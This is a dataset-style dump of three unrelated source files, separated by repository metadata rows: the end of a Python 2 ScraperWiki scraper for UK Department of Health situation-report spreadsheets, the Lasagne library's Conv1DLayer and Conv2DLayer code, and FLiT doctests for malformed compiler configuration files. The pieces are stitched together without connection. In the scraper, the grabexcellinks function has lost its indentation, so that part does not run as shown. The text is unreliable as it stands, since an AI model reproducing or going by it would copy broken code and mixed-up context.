        fromdate = patchDate(fromdate, todate)
    return (fromdate, todate)
def scrapesheets3(XLS):
    # Download one weekly sitrep workbook and reshape it: one SQLite table
    # per sheet, one saved row per (provider row, date column) cell.
    # Relies on the module globals tableLookup and dateLookup.
    xlbin = scraperwiki.scrape(XLS)
    book = xlrd.open_workbook(file_contents=xlbin)
    print book.sheet_names()
    for sheetname in book.sheet_names():
        bigdata=[]
        if sheetname in tableLookup:
            tt=tableLookup[sheetname]
            #If we want to clear the tables...
            #dropper(tt)
        else:
            # Unseen sheet name: mint the next 'id_N' and register it in the
            # sheet directory (swdata).
            l=len(tableLookup)
            sid='id_'+str(l)
            tableLookup[sheetname]=sid
            scraperwiki.sqlite.save(["id", "name"], {'id':sid,'name':sheetname} )
            tt=tableLookup[sheetname]
            #exit(-1) #crash out for now...
        print 'Tablename:',tt
        sheet = book.sheet_by_name(sheetname)
        # Row 17 is the first data row; its length gives the sheet width.
        # NOTE(review): assumes every sheet has at least 18 rows -- confirm.
        sheetwidth=len(sheet.row_values(17))
        print sheetname,sheetwidth,sheet.nrows
        keys={}  # col -> heading for the identifier columns (cols 1-3)
        facetAkeys={}  # col -> date / date-range heading
        tokeys={}  # col -> parsed range end as YYYY-MM-DD
        fromkeys={}  # col -> parsed range start as YYYY-MM-DD
        facetBkeys={}  # col -> sub-heading beneath a date, '' if none
        for col in range(1,4):
            keys[col]=sheet.row_values(14)[col]
        lastfacetAkey=-1
        # Two heading layouts exist: dates in row 13 with sub-headings in
        # row 14, or (when row 13 cols 4/5 are empty) dates directly in row 14.
        if sheet.row_values(13)[5]!='' or sheet.row_values(13)[4]!='':
            for col in range (4,sheetwidth):
                if sheet.row_values(13)[col]!='':
                    try:
                        facetAkeys[col]=minimalist_xldate_as_datetime(sheet.row_values(13)[col],book.datemode).date().strftime("%Y-%m-%d")
                    except:
                        # Heading is not an Excel serial date; keep raw text.
                        facetAkeys[col]=sheet.row_values(13)[col]
                    lastfacetAkey=facetAkeys[col]
                else:
                    # Blank cell under a merged date heading: reuse previous.
                    facetAkeys[col]=lastfacetAkey
                if facetAkeys[col] not in dateLookup:
                    (fromkeys[col],tokeys[col])=dateRangeParse(facetAkeys[col])
                    dateLookup[facetAkeys[col]]=(fromkeys[col],tokeys[col])
                else:
                    (fromkeys[col],tokeys[col])=dateLookup[facetAkeys[col]]
                facetBkeys[col]=sheet.row_values(14)[col]
        else:
            for col in range (4,sheetwidth):
                try:
                    facetAkeys[col]=minimalist_xldate_as_datetime(sheet.row_values(14)[col],book.datemode).date().strftime("%Y-%m-%d")
                    #It may make more sense to save this as a proper date - in which case just drop the strftime bit
                    #facetAkeys[col]=minimalist_xldate_as_datetime(sheet.row_values(14)[col],book.datemode).date()
                    #As query in https://scraperwiki.com/views/ou_bbc_co-pro_on_iplayer_-_bootstrap/ shows, we can do time based SQLite queries?
                    #TO DO? Some of the facetAkeys are date ranges, so maybe bettwe to split as facetAkeysFrom and facetAkeysTo?
                    ##If it's not a range, set from and to as the same.
                except:
                    facetAkeys[col]=sheet.row_values(14)[col]
                if facetAkeys[col] not in dateLookup:
                    (fromkeys[col],tokeys[col])=dateRangeParse(facetAkeys[col])
                    dateLookup[facetAkeys[col]]=(fromkeys[col],tokeys[col])
                else:
                    (fromkeys[col],tokeys[col])=dateLookup[facetAkeys[col]]
                facetBkeys[col]=''
        #print fromkeys
        for row in range(17, sheet.nrows):
            data={}
            #hack fudge error trap: skip rows with no Code (col 2) value
            if sheet.row_values(row)[2]=='':continue
            for col in range(1,4):
                #these are typically ['SHA','Code','Name',]
                data[keys[col]]=sheet.row_values(row)[col]
            for col in range (4,sheetwidth):
                #TO DO - change colhead to tableName
                #data['table']=sheetname
                data['tableName']=sheetname
                data['facetA']=facetAkeys[col]
                #TO DO - change colhead to fromDateStr
                #data['from']=fromkeys[col]
                data['fromDateStr']=fromkeys[col]
                #TO DO - change colhead to toDateStr
                #data['to']=tokeys[col]
                data['toDateStr']=tokeys[col]
                data['facetB']=facetBkeys[col]
                data["value"]=sheet.row_values(row)[col]
                # Deterministic row id so re-scrapes overwrite, not duplicate.
                data['id']=md5.new(''.join([ data['tableName'],data['Code'],data['fromDateStr'],data['facetB'] ])).hexdigest()
                #scraperwiki.sqlite.save(unique_keys=['id'],table_name=tt, data=data)
                #If we get properly unique keys - uniqid - eg as in hash idea above but also adding tt into hash mix, we can do a fulltable?
                #scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=data,verbose = 0)
                #If data variable persists, the pass by reference append of the data dict breaks bigdata; so force append by value instead
                bigdata.append(data.copy())
                # Flush in batches of ~1000 rows.
                if len(bigdata)>1000:
                    scraperwiki.sqlite.save(unique_keys=['id'],table_name=tt, data=bigdata,verbose = 0)
                    #scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=tablePatch(bigdata),verbose = 0)
                    bigdata=[]
        #Tidy up by saving any data that's left outstanding
        scraperwiki.sqlite.save(unique_keys=['id'],table_name=tt, data=bigdata,verbose = 0)
        #scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=tablePatch(bigdata),verbose = 0)
        bigdata=[]
    # Remember this workbook URL so future runs skip it.
    scraperwiki.sqlite.save(unique_keys=['url'],table_name='scraped', data={'url':XLS})
#TESTING
#scrapesheets2('https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Web-file-WE-18-11-12.xls')
#scrapesheets3('https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Web-file-WE-18-11-12.xls')
#From a scraper by paulbradshaw
#define our URL - this links to all the spreadsheets
#URL = 'http://transparency.dh.gov.uk/2012/10/26/winter-pressures-daily-situation-reports-2012-13/'
URL='http://www.dh.gov.uk/en/Publicationsandstatistics/Statistics/Performancedataandstatistics/DailySituationReports/index.htm'
#HTML to grab is:
#<p><strong>November 2012</strong><br />
#<a href="https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Web-file-WE-18-11-12.xls">DailySR – week ending 18 Nov 12.xls (492KB).</a><br />
#<a href="https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Pub-file-WE-11-11-123.xls">DailySR – 6 Nov 12 to 11 Nov 12.xls (446KB)</a>.</p>
#HTML to avoid that generates an error is:
#<p>Data for this collection is available back to November 2010.<br />
#For previous years’ data <a #href="http://www.dh.gov.uk/en/Publicationsandstatistics/Statistics/Performancedataandstatistics/DailySituationReports/index.htm">click here</a>.</p>
#Create a new function which takes one parameter and names it 'URL'
def grabexcellinks(URL):
#Use Scraperwiki's scrape function on 'URL', put results in new variable 'html'
html = scraperwiki.scrape(URL)
#and show it us
print html
#Use lxml.html's fromstring function on 'html', put results in new variable 'root'
root = lxml.html.fromstring(html)
#use cssselect method on 'root' to grab all <a> tags within a <p> tag - and put in a new list variable 'links'
links = root.cssselect('p a')
#for each item in that list variable, from the first to the second last [0:-1], put it in the variable 'link'
'''
for link in links[0:-1]:
#and print the text_content of that (after the string "link text:")
print "link text:", link.text_content()
#use the attrib.get method on 'link' to grab the href= attribute of the HTML, and put in new 'linkurl' variable
linkurl = link.attrib.get('href')
#print it
print linkurl
#run the function scrapesheets, using that variable as the parameter
scrapesheets(linkurl)
'''
urls=[]
for link in links[0:-1]: urls.append(link.attrib.get('href'))
return urls
#grabexcellinks(URL)
#--
#urls= grabexcellinks(URL)
#I'm starting to think - is the first sheet all the data to date?
#In which case, we probably need to avoid scraping this one if we're doing weekly updates
# NOTE(review): `urls` is reset to an empty list here and the grabexcellinks()
# call above is commented out, so the loop below is currently dead code --
# only the hard-coded workbook after it is fetched. Confirm this was a
# deliberate switch-off before re-enabling the index-page scrape.
urls=[]
for url in urls[1:]:
    if url not in scrapedAlready:
        print url
        scrapesheets3(url)
    else: print "Ignoring",url
# Directly ingest one specific sitrep workbook.
scrapesheets3('http://www.dh.gov.uk/prod_consum_dh/groups/dh_digitalassets/@dh/@en/@ps/@sta/@perf/documents/digitalasset/dh_132988.xls')
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
98b6ff482a1ec4bd5a748377edc96a38f4733156 | 13a32b92b1ba8ffb07e810dcc8ccdf1b8b1671ab | /home--tommy--mypy/mypy/lib/python2.7/site-packages/lasagne/layers/conv.py | 3b3dde508751920cdb89839ce4bb86786464924e | [
"Unlicense"
] | permissive | tommybutler/mlearnpy2 | 8ec52bcd03208c9771d8d02ede8eaa91a95bda30 | 9e5d377d0242ac5eb1e82a357e6701095a8ca1ff | refs/heads/master | 2022-10-24T23:30:18.705329 | 2022-10-17T15:41:37 | 2022-10-17T15:41:37 | 118,529,175 | 0 | 2 | Unlicense | 2022-10-15T23:32:18 | 2018-01-22T23:27:10 | Python | UTF-8 | Python | false | false | 20,404 | py | import theano.tensor as T
from .. import init
from .. import nonlinearities
from ..utils import as_tuple
from ..theano_extensions import conv, padding
from .base import Layer
__all__ = [
"Conv1DLayer",
"Conv2DLayer",
]
def conv_output_length(input_length, filter_size, stride, pad=0):
    """Helper function to compute the output size of a convolution operation

    This function computes the length along a single axis, which corresponds
    to a 1D convolution. It can also be used for convolutions with higher
    dimensionalities by using it individually for each axis.

    Parameters
    ----------
    input_length : int
        The size of the input.

    filter_size : int
        The size of the filter.

    stride : int
        The stride of the convolution operation.

    pad : int, 'full', 'same' or 'valid' (default: 0)
        By default, the convolution is only computed where the input and the
        filter fully overlap (a valid convolution). When ``stride=1``, this
        yields an output that is smaller than the input by ``filter_size - 1``.
        The `pad` argument allows you to implicitly pad the input with zeros,
        extending the output size.

        A single integer results in symmetric zero-padding of the given size on
        both borders.

        ``'full'`` pads with one less than the filter size on both sides. This
        is equivalent to computing the convolution wherever the input and the
        filter overlap by at least one position.

        ``'same'`` pads with half the filter size on both sides (one less on
        the second side for an even filter size). When ``stride=1``, this
        results in an output size equal to the input size.

        ``'valid'`` is an alias for ``0`` (no padding / a valid convolution).

    Returns
    -------
    int
        The output size corresponding to the given convolution parameters, or
        ``None`` if `input_length` is ``None`` (i.e. unknown).

    Raises
    ------
    ValueError
        When an invalid padding is specified, a `ValueError` is raised.
    """
    if input_length is None:
        return None
    if pad == 'valid':
        output_length = input_length - filter_size + 1
    elif pad == 'full':
        output_length = input_length + filter_size - 1
    elif pad == 'same':
        output_length = input_length
    elif isinstance(pad, int):
        output_length = input_length + 2 * pad - filter_size + 1
    else:
        raise ValueError('Invalid pad: {0}'.format(pad))

    # This is the integer arithmetic equivalent to
    # np.ceil(output_length / stride)
    output_length = (output_length + stride - 1) // stride

    return output_length
class Conv1DLayer(Layer):
    """
    lasagne.layers.Conv1DLayer(incoming, num_filters, filter_size, stride=1,
    pad=0, untie_biases=False, W=lasagne.init.GlorotUniform(),
    b=lasagne.init.Constant(0.), nonlinearity=lasagne.nonlinearities.rectify,
    convolution=lasagne.theano_extensions.conv.conv1d_mc0, **kwargs)

    1D convolutional layer

    Performs a 1D convolution on its input and optionally adds a bias and
    applies an elementwise nonlinearity.

    Parameters
    ----------
    incoming : a :class:`Layer` instance or a tuple
        The layer feeding into this layer, or the expected input shape. The
        output of this layer should be a 3D tensor, with shape
        ``(batch_size, num_input_channels, input_length)``.

    num_filters : int
        The number of learnable convolutional filters this layer has.

    filter_size : int or iterable of int
        An integer or a 1-element tuple specifying the size of the filters.

    stride : int or iterable of int
        An integer or a 1-element tuple specifying the stride of the
        convolution operation.

    pad : int, iterable of int, 'full', 'same' or 'valid' (default: 0)
        By default, the convolution is only computed where the input and the
        filter fully overlap (a valid convolution). When ``stride=1``, this
        yields an output that is smaller than the input by ``filter_size - 1``.
        The `pad` argument allows you to implicitly pad the input with zeros,
        extending the output size.

        An integer or a 1-element tuple results in symmetric zero-padding of
        the given size on both borders.

        ``'full'`` pads with one less than the filter size on both sides. This
        is equivalent to computing the convolution wherever the input and the
        filter overlap by at least one position.

        ``'same'`` pads with half the filter size on both sides (one less on
        the second side for an even filter size). When ``stride=1``, this
        results in an output size equal to the input size.

        ``'valid'`` is an alias for ``0`` (no padding / a valid convolution).

    untie_biases : bool (default: False)
        If ``False``, the layer will have a bias parameter for each channel,
        which is shared across all positions in this channel. As a result, the
        `b` attribute will be a vector (1D).

        If True, the layer will have separate bias parameters for each
        position in each channel. As a result, the `b` attribute will be a
        matrix (2D).

    W : Theano shared variable, numpy array or callable
        An initializer for the weights of the layer. This should initialize the
        layer weights to a 3D array with shape
        ``(num_filters, num_input_channels, filter_length)``.
        See :func:`lasagne.utils.create_param` for more information.

    b : Theano shared variable, numpy array, callable or None
        An initializer for the biases of the layer. If None is provided, the
        layer will have no biases. This should initialize the layer biases to
        a 1D array with shape ``(num_filters,)`` if `untie_biases` is set to
        ``False``. If it is set to ``True``, its shape should be
        ``(num_filters, input_length)`` instead.
        See :func:`lasagne.utils.create_param` for more information.

    nonlinearity : callable or None
        The nonlinearity that is applied to the layer activations. If None
        is provided, the layer will be linear.

    convolution : callable
        The convolution implementation to use. The
        `lasagne.theano_extensions.conv` module provides some alternative
        implementations for 1D convolutions, because the Theano API only
        features a 2D convolution implementation. Usually it should be fine
        to leave this at the default value.

    **kwargs
        Any additional keyword arguments are passed to the `Layer` superclass.

    Attributes
    ----------
    W : Theano shared variable
        Variable representing the filter weights.

    b : Theano shared variable
        Variable representing the biases.

    Notes
    -----
    Theano's underlying convolution (:func:`theano.tensor.nnet.conv.conv2d`)
    only supports ``pad=0`` and ``pad='full'``. This layer emulates other modes
    by cropping a full convolution or explicitly padding the input with zeros.
    """
    def __init__(self, incoming, num_filters, filter_size, stride=1,
                 pad=0, untie_biases=False,
                 W=init.GlorotUniform(), b=init.Constant(0.),
                 nonlinearity=nonlinearities.rectify,
                 convolution=conv.conv1d_mc0, **kwargs):
        super(Conv1DLayer, self).__init__(incoming, **kwargs)
        # A nonlinearity of None means "linear layer".
        if nonlinearity is None:
            self.nonlinearity = nonlinearities.identity
        else:
            self.nonlinearity = nonlinearity

        self.num_filters = num_filters
        self.filter_size = as_tuple(filter_size, 1)
        self.stride = as_tuple(stride, 1)
        self.untie_biases = untie_biases
        self.convolution = convolution

        # Normalise `pad`: 'valid' becomes an explicit zero pad; 'full' and
        # 'same' stay as strings and are handled in get_output_for().
        if pad == 'valid':
            self.pad = (0,)
        elif pad in ('full', 'same'):
            self.pad = pad
        else:
            self.pad = as_tuple(pad, 1, int)

        self.W = self.add_param(W, self.get_W_shape(), name="W")
        if b is None:
            self.b = None
        else:
            if self.untie_biases:
                # One bias per (filter, output position).
                biases_shape = (num_filters, self.output_shape[2])
            else:
                biases_shape = (num_filters,)
            self.b = self.add_param(b, biases_shape, name="b",
                                    regularizable=False)

    def get_W_shape(self):
        """Get the shape of the weight matrix `W`.

        Returns
        -------
        tuple of int
            The shape of the weight matrix.
        """
        num_input_channels = self.input_shape[1]
        return (self.num_filters, num_input_channels, self.filter_size[0])

    def get_output_shape_for(self, input_shape):
        # For 'full'/'same', pass the string through to conv_output_length
        # for both (only) spatial axis computations.
        pad = self.pad if isinstance(self.pad, tuple) else (self.pad,)
        output_length = conv_output_length(input_shape[2],
                                           self.filter_size[0],
                                           self.stride[0],
                                           pad[0])
        return (input_shape[0], self.num_filters, output_length)

    def get_output_for(self, input, input_shape=None, **kwargs):
        # the optional input_shape argument is for when get_output_for is
        # called directly with a different shape than self.input_shape.
        if input_shape is None:
            input_shape = self.input_shape
        if self.stride == (1,) and self.pad == 'same':
            # simulate same convolution by cropping a full convolution
            conved = self.convolution(input, self.W, subsample=self.stride,
                                      image_shape=input_shape,
                                      filter_shape=self.get_W_shape(),
                                      border_mode='full')
            shift = (self.filter_size[0] - 1) // 2
            conved = conved[:, :, shift:input.shape[2] + shift]
        else:
            # no padding needed, or explicit padding of input needed
            if self.pad == 'full':
                border_mode = 'full'
                pad = (0, 0)
            elif self.pad == 'same':
                # 'same' with stride > 1: pad explicitly (asymmetrically for
                # even filter sizes) and run a valid convolution.
                border_mode = 'valid'
                pad = self.filter_size[0] // 2, (self.filter_size[0] - 1) // 2
            else:
                border_mode = 'valid'
                pad = (self.pad[0], self.pad[0])
            if pad != (0, 0):
                input = padding.pad(input, [pad], batch_ndim=2)
                input_shape = (input_shape[0], input_shape[1],
                               None if input_shape[2] is None else
                               input_shape[2] + pad[0] + pad[1])
            conved = self.convolution(input, self.W, subsample=self.stride,
                                      image_shape=input_shape,
                                      filter_shape=self.get_W_shape(),
                                      border_mode=border_mode)

        if self.b is None:
            activation = conved
        elif self.untie_biases:
            # Per-position biases: broadcast over the batch axis only.
            activation = conved + self.b.dimshuffle('x', 0, 1)
        else:
            # Per-channel biases: broadcast over batch and length axes.
            activation = conved + self.b.dimshuffle('x', 0, 'x')

        return self.nonlinearity(activation)
class Conv2DLayer(Layer):
"""
lasagne.layers.Conv2DLayer(incoming, num_filters, filter_size,
stride=(1, 1), pad=0, untie_biases=False,
W=lasagne.init.GlorotUniform(), b=lasagne.init.Constant(0.),
nonlinearity=lasagne.nonlinearities.rectify,
convolution=theano.tensor.nnet.conv2d, **kwargs)
2D convolutional layer
Performs a 2D convolution on its input and optionally adds a bias and
applies an elementwise nonlinearity.
Parameters
----------
incoming : a :class:`Layer` instance or a tuple
The layer feeding into this layer, or the expected input shape. The
output of this layer should be a 4D tensor, with shape
``(batch_size, num_input_channels, input_rows, input_columns)``.
num_filters : int
The number of learnable convolutional filters this layer has.
filter_size : int or iterable of int
An integer or a 2-element tuple specifying the size of the filters.
stride : int or iterable of int
An integer or a 2-element tuple specifying the stride of the
convolution operation.
pad : int, iterable of int, 'full', 'same' or 'valid' (default: 0)
By default, the convolution is only computed where the input and the
filter fully overlap (a valid convolution). When ``stride=1``, this
yields an output that is smaller than the input by ``filter_size - 1``.
The `pad` argument allows you to implicitly pad the input with zeros,
extending the output size.
A single integer results in symmetric zero-padding of the given size on
all borders, a tuple of two integers allows different symmetric padding
per dimension.
``'full'`` pads with one less than the filter size on both sides. This
is equivalent to computing the convolution wherever the input and the
filter overlap by at least one position.
``'same'`` pads with half the filter size on both sides (one less on
the second side for an even filter size). When ``stride=1``, this
results in an output size equal to the input size.
``'valid'`` is an alias for ``0`` (no padding / a valid convolution).
Note that ``'full'`` and ``'same'`` can be faster than equivalent
integer values due to optimizations by Theano.
untie_biases : bool (default: False)
If ``False``, the layer will have a bias parameter for each channel,
which is shared across all positions in this channel. As a result, the
`b` attribute will be a vector (1D).
If True, the layer will have separate bias parameters for each
position in each channel. As a result, the `b` attribute will be a
3D tensor.
W : Theano shared variable, numpy array or callable
An initializer for the weights of the layer. This should initialize the
layer weights to a 4D array with shape
``(num_filters, num_input_channels, filter_rows, filter_columns)``.
See :func:`lasagne.utils.create_param` for more information.
b : Theano shared variable, numpy array, callable or None
An initializer for the biases of the layer. If None is provided, the
layer will have no biases. This should initialize the layer biases to
a 1D array with shape ``(num_filters,)`` if `untied_biases` is set to
``False``. If it is set to ``True``, its shape should be
``(num_filters, input_rows, input_columns)`` instead.
See :func:`lasagne.utils.create_param` for more information.
nonlinearity : callable or None
The nonlinearity that is applied to the layer activations. If None
is provided, the layer will be linear.
convolution : callable
The convolution implementation to use. Usually it should be fine to
leave this at the default value.
**kwargs
Any additional keyword arguments are passed to the `Layer` superclass.
Attributes
----------
W : Theano shared variable
Variable representing the filter weights.
b : Theano shared variable
Variable representing the biases.
Notes
-----
Theano's underlying convolution (:func:`theano.tensor.nnet.conv.conv2d`)
only supports ``pad=0`` and ``pad='full'``. This layer emulates other modes
by cropping a full convolution or explicitly padding the input with zeros.
"""
def __init__(self, incoming, num_filters, filter_size, stride=(1, 1),
pad=0, untie_biases=False,
W=init.GlorotUniform(), b=init.Constant(0.),
nonlinearity=nonlinearities.rectify,
convolution=T.nnet.conv2d, **kwargs):
super(Conv2DLayer, self).__init__(incoming, **kwargs)
if nonlinearity is None:
self.nonlinearity = nonlinearities.identity
else:
self.nonlinearity = nonlinearity
self.num_filters = num_filters
self.filter_size = as_tuple(filter_size, 2)
self.stride = as_tuple(stride, 2)
self.untie_biases = untie_biases
self.convolution = convolution
if pad == 'valid':
self.pad = (0, 0)
elif pad in ('full', 'same'):
self.pad = pad
else:
self.pad = as_tuple(pad, 2, int)
self.W = self.add_param(W, self.get_W_shape(), name="W")
if b is None:
self.b = None
else:
if self.untie_biases:
biases_shape = (num_filters, self.output_shape[2], self.
output_shape[3])
else:
biases_shape = (num_filters,)
self.b = self.add_param(b, biases_shape, name="b",
regularizable=False)
def get_W_shape(self):
"""Get the shape of the weight matrix `W`.
Returns
-------
tuple of int
The shape of the weight matrix.
"""
num_input_channels = self.input_shape[1]
return (self.num_filters, num_input_channels, self.filter_size[0],
self.filter_size[1])
def get_output_shape_for(self, input_shape):
pad = self.pad if isinstance(self.pad, tuple) else (self.pad,) * 2
output_rows = conv_output_length(input_shape[2],
self.filter_size[0],
self.stride[0],
pad[0])
output_columns = conv_output_length(input_shape[3],
self.filter_size[1],
self.stride[1],
pad[1])
return (input_shape[0], self.num_filters, output_rows, output_columns)
    def get_output_for(self, input, input_shape=None, **kwargs):
        """Apply convolution, bias and nonlinearity to the input expression."""
        # The optional input_shape argument is for when get_output_for is
        # called directly with a different shape than self.input_shape.
        if input_shape is None:
            input_shape = self.input_shape
        if self.stride == (1, 1) and self.pad == 'same':
            # simulate same convolution by cropping a full convolution
            conved = self.convolution(input, self.W, subsample=self.stride,
                                      image_shape=input_shape,
                                      filter_shape=self.get_W_shape(),
                                      border_mode='full')
            # Crop the central part of the 'full' output so the result has
            # the same spatial size as the input.
            shift_x = (self.filter_size[0] - 1) // 2
            shift_y = (self.filter_size[1] - 1) // 2
            conved = conved[:, :, shift_x:input.shape[2] + shift_x,
                            shift_y:input.shape[3] + shift_y]
        else:
            # no padding needed, or explicit padding of input needed
            if self.pad == 'full':
                border_mode = 'full'
                pad = [(0, 0), (0, 0)]
            elif self.pad == 'same':
                # 'same' with stride != (1, 1): pad the input explicitly,
                # then run a 'valid' convolution below.
                border_mode = 'valid'
                pad = [(self.filter_size[0] // 2,
                        (self.filter_size[0] - 1) // 2),
                       (self.filter_size[1] // 2,
                        (self.filter_size[1] - 1) // 2)]
            else:
                # Explicit integer padding on both sides of each dimension.
                border_mode = 'valid'
                pad = [(self.pad[0], self.pad[0]), (self.pad[1], self.pad[1])]
            if pad != [(0, 0), (0, 0)]:
                input = padding.pad(input, pad, batch_ndim=2)
                # Keep the symbolic shape hint consistent with the padded
                # input (unknown `None` dimensions stay unknown).
                input_shape = (input_shape[0], input_shape[1],
                               None if input_shape[2] is None else
                               input_shape[2] + pad[0][0] + pad[0][1],
                               None if input_shape[3] is None else
                               input_shape[3] + pad[1][0] + pad[1][1])
            conved = self.convolution(input, self.W, subsample=self.stride,
                                      image_shape=input_shape,
                                      filter_shape=self.get_W_shape(),
                                      border_mode=border_mode)
        if self.b is None:
            activation = conved
        elif self.untie_biases:
            # Untied biases: add a per-filter, per-position bias map.
            activation = conved + self.b.dimshuffle('x', 0, 1, 2)
        else:
            # Tied biases: broadcast one bias per filter over all positions.
            activation = conved + self.b.dimshuffle('x', 0, 'x', 'x')
        return self.nonlinearity(activation)
# TODO: add Conv3DLayer
| [
"tbutler.github@internetalias.net"
] | tbutler.github@internetalias.net |
983d4615eb75145cbb024178a9271475c82399be | 29a38674cd5cda4880d539ee235ea118b750571e | /tests/flit_cli/flit_update/tst_badconfig.py | 495501f01a3766375523bcada2ceebbb585b41c1 | [] | no_license | hbrunie/FLiT | 1f0be509f776b86380b215b30e7b365921dd3425 | 836bc3cd2befebc9cfe20926fd855b1f5d29ae17 | refs/heads/master | 2020-07-09T20:26:40.644089 | 2019-04-10T18:47:25 | 2019-04-10T18:47:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,702 | py | # -- LICENSE BEGIN --
#
# Copyright (c) 2015-2018, Lawrence Livermore National Security, LLC.
#
# Produced at the Lawrence Livermore National Laboratory
#
# Written by
# Michael Bentley (mikebentley15@gmail.com),
# Geof Sawaya (fredricflinstone@gmail.com),
# and Ian Briggs (ian.briggs@utah.edu)
# under the direction of
# Ganesh Gopalakrishnan
# and Dong H. Ahn.
#
# LLNL-CODE-743137
#
# All rights reserved.
#
# This file is part of FLiT. For details, see
# https://pruners.github.io/flit
# Please also read
# https://github.com/PRUNERS/FLiT/blob/master/LICENSE
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the disclaimer below.
#
# - Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the disclaimer
# (as noted below) in the documentation and/or other materials
# provided with the distribution.
#
# - Neither the name of the LLNS/LLNL nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
# SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
#
# Additional BSD Notice
#
# 1. This notice is required to be provided under our contract
# with the U.S. Department of Energy (DOE). This work was
# produced at Lawrence Livermore National Laboratory under
# Contract No. DE-AC52-07NA27344 with the DOE.
#
# 2. Neither the United States Government nor Lawrence Livermore
# National Security, LLC nor any of their employees, makes any
# warranty, express or implied, or assumes any liability or
# responsibility for the accuracy, completeness, or usefulness of
# any information, apparatus, product, or process disclosed, or
# represents that its use would not infringe privately-owned
# rights.
#
# 3. Also, reference herein to any specific commercial products,
# process, or services by trade name, trademark, manufacturer or
# otherwise does not necessarily constitute or imply its
# endorsement, recommendation, or favoring by the United States
# Government or Lawrence Livermore National Security, LLC. The
# views and opinions of authors expressed herein do not
# necessarily state or reflect those of the United States
# Government or Lawrence Livermore National Security, LLC, and
# shall not be used for advertising or product endorsement
# purposes.
#
# -- LICENSE END --
'''
Tests error cases in the configuration file, such as specifying more than one of a certain type of compiler.
>>> from io import StringIO
>>> import os
>>> import shutil
>>> from tst_common_funcs import runconfig
>>> configstr = \\
... '[dev_build]\\n' \\
... 'compiler_name = \\'name-does-not-exist\\'\\n'
>>> runconfig(configstr)
Traceback (most recent call last):
...
AssertionError: Compiler name name-does-not-exist not found
>>> configstr = \\
... '[ground_truth]\\n' \\
... 'compiler_name = \\'another-name-that-does-not-exist\\'\\n'
>>> runconfig(configstr)
Traceback (most recent call last):
...
AssertionError: Compiler name another-name-that-does-not-exist not found
>>> runconfig('[compiler]\\n')
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml improperly configured, needs [[compiler]] section
>>> runconfig('[[compiler]]\\n')
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml: compiler "{}" is missing the "name" field
>>> runconfig('[[compiler]]\\n'
... 'name = \\'hello\\'\\n')
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml: compiler "{'name': 'hello'}" is missing the "type" field
>>> runconfig('[[compiler]]\\n'
... 'name = \\'hello\\'\\n'
... 'type = \\'gcc\\'\\n') # doctest:+ELLIPSIS
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml: compiler "{...}" is missing the "binary" field
>>> runconfig('[[compiler]]\\n'
... 'binary = \\'my-special-compiler\\'\\n'
... 'name = \\'hello\\'\\n'
... 'type = \\'my-unsupported-type\\'\\n')
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml: unsupported compiler type "my-unsupported-type"
>>> runconfig('[[compiler]]\\n'
... 'binary = \\'gcc\\'\\n'
... 'name = \\'gcc\\'\\n'
... 'type = \\'gcc\\'\\n'
... '\\n'
... '[[compiler]]\\n'
... 'binary = \\'gcc-2\\'\\n'
... 'name = \\'gcc-2\\'\\n'
... 'type = \\'gcc\\'\\n'
... )
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml: cannot have multiple compilers of the same type (gcc)
>>> runconfig('[[compiler]]\\n'
... 'binary = \\'gcc\\'\\n'
... 'name = \\'gcc\\'\\n'
... 'type = \\'gcc\\'\\n'
... '\\n'
... '[[compiler]]\\n'
... 'binary = \\'gcc-2\\'\\n'
... 'name = \\'gcc\\'\\n'
... 'type = \\'clang\\'\\n'
... )
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml: cannot have multiple compilers of the same name (gcc)
'''
# Test setup before the docstring is run.
import sys
# Remember the original sys.path so it can be restored after importing the
# shared test harness from two directories up.
before_path = sys.path[:]
sys.path.append('../..')
import test_harness as th
sys.path = before_path
if __name__ == '__main__':
    # Run the module-level doctests; the failure count becomes the exit code
    # (0 on success).
    from doctest import testmod
    failures, tests = testmod()
    sys.exit(failures)
| [
"mikebentley15@gmail.com"
] | mikebentley15@gmail.com |
